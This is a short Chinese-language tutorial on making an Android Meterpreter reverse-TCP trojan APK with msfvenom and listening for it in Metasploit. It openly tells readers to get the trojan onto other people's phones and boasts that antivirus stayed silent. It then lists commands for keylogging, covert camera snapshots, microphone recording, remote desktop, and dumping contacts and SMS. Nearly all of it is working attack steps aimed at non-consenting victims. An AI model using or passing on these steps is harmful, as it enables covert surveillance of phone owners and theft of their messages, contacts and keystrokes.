行動開始
先查看kali的ip,我的是1.114
然后輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
5555是設置的端口,可以自己更改 顯示這個說明已經生成成功了
然后啟動msf:msfconsole 然后輸入命令:
1.use exploit/multi/handler //加載模塊
2. set payload android/meterpreter/reverse_tcp //選擇Payload
3.show options //查看參數設置
這個payload里邊有兩個參數要設置 LHOST和LPORT 表示地址和端口 默認的端口是4444 現在我們來更改設置
1.set LHOST 192.168.1.114 //這里的地址設置成我們剛才生成木馬的IP地址
2.set LPORT 5555 //這里的端口設置成剛才我們生成木馬所監聽的端口
3.exploit //開始執行漏洞 開始監聽,等待手機上線
靠自己發揮把木馬安裝到別人手機上,我這里測試就用自己的手機安裝上了
安裝過程360全程無提示~
紅色框出的地方就說明手機上線了 然后可以輸入sysinfo 查看手機信息
webcam_list 查看手機有多少個攝像頭 這里顯示是2個
keyscan_start:開始鍵盤記錄
keyscan_dump:下載鍵盤記錄
keyscan_stop:結束鍵盤記錄
record_mic:錄制聲音(如果目標主機上有話筒的話)
webcam_chat:查看攝像頭接口
webcam_stream //開啟攝像頭
webcam_list:查看攝像頭列表
webcam_snap //隱秘拍照功能
webcam_snap 隱秘拍照功能 -i 1 或者2是開啟前置攝像頭和后置攝像頭的
run vnc:開啟遠程桌面
dump_contacts //導出電話號碼
dump_sms //導出信息
可以輸入?查看更多命令
